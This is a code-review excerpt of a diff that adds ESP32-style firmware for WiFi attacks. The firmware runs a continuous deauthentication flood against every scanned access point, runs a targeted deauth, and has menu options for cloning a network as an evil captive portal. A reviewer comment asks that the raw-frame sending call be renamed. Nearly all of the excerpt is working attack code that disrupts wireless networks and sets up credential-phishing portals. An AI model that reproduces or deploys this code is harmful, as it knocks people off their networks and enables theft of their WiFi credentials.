history/src/modules/wifi/wifi_atks_20240802063120.cpp

```diff
@@ -0,0 +1,572 @@
+
+  uint32_t lastTime = millis();
+  uint16_t count = 0;
+
+  while (true)
+  {
+    for (const auto &record : ap_records)
+    {
+      memcpy(&deauth_frame[10], record.bssid, 6);
+      memcpy(&deauth_frame[16], record.bssid, 6);
+      wsl_bypasser_send_raw_frame(deauth_frame, sizeof(deauth_frame_default));
+      count += 3;
+    }
+
+    // Update counter every 2 seconds
+    if (millis() - lastTime > 2000)
+    {
+      tft.setCursor(6, HEIGHT - 23);
+      tft.print("Frames: " + String(count / 2) + "/s");
+      count = 0;
+      lastTime = millis();
+    }
+
+    if (checkEscPress())
+      break;
+  }
+
+  wifiDisconnect();
+  returnToMenu = true;
+}
+
+/***************************************************************************************
+** function: target_atk_menu
+** @brief: Open menu to choose which AP Attack
+***************************************************************************************/
+void target_atk_menu(String tssid, String mac, uint8_t channel)
+{
+  options = {
+      {"Information", [=]()
+       { wifi_atk_info(tssid, mac, channel); }},
+      {"Deauth", [=]()
+       { target_atk(tssid, mac, channel); }},
+      {"Deauth Flood", [=]()
+       { deauthFloodAttack(); }},
+      {"Clone Portal", [=]()
+       { startEvilPortal(tssid, channel, false); }},
+      {"Deauth+Clone", [=]()
+       { startEvilPortal(tssid, channel, true); }},
+      {"Main Menu", [=]()
+       { backToMenu(); }},
+  };
+
+  delay(200);
+  loopOptions(options);
+  delay(200);
+}
+
+/***************************************************************************************
+** function: target_atk
+** @brief: Deploy Target deauth
+***************************************************************************************/
+void target_atk(String tssid, String mac, uint8_t channel)
+{
+  Serial.begin(115200);
+
+  WiFi.mode(WIFI_AP);
+  if (!WiFi.softAP(tssid, emptyString, channel, 1, 4, false))
+  {
+    displayError("Falha 1");
+    while (!checkSelPress())
+    {
+      yield();
+    }
+  }
+  wifiConnected = true;
+  memcpy(deauth_frame, deauth_frame_default, sizeof(deauth_frame_default));
+  wsl_bypasser_send_raw_frame(&ap_record, channel);
+
+  // loop com o ataque mostrando o numero de frames por segundo
+  uint32_t tmp = 0;
+  uint16_t count = 0;
+  tmp = millis();
+  bool redraw = true;
+  delay(200);
+  checkSelPress();
+
+  tft.setTextColor(FGCOLOR, BGCOLOR);
+  tft.setTextSize(FM);
+  setCpuFrequencyMhz(240);
+  while (1)
+  {
+    if (redraw)
+    {
+      // desenhar a tela
+      drawMainBorder();
+      tft.setTextColor(TFT_RED);
+      tft.drawCentreString("Target Deauth", tft.width() / 2, 28, SMOOTH_FONT);
+      tft.setTextColor(FGCOLOR);
+      tft.drawString("AP: " + tssid, 6, 48);
+      tft.drawString("Channel: " + String(channel), 0, 66);
+      tft.drawString(mac, 0, 84);
+      delay(50);
+      redraw = false;
+    }
+    // Send frame
+    wsl_bypasser_send_raw_frame(deauth_frame, sizeof(deauth_frame_default));
```

Comment:
change the call for 
`send_raw_frame(deauth_frame, sizeof(deauth_frame_default));`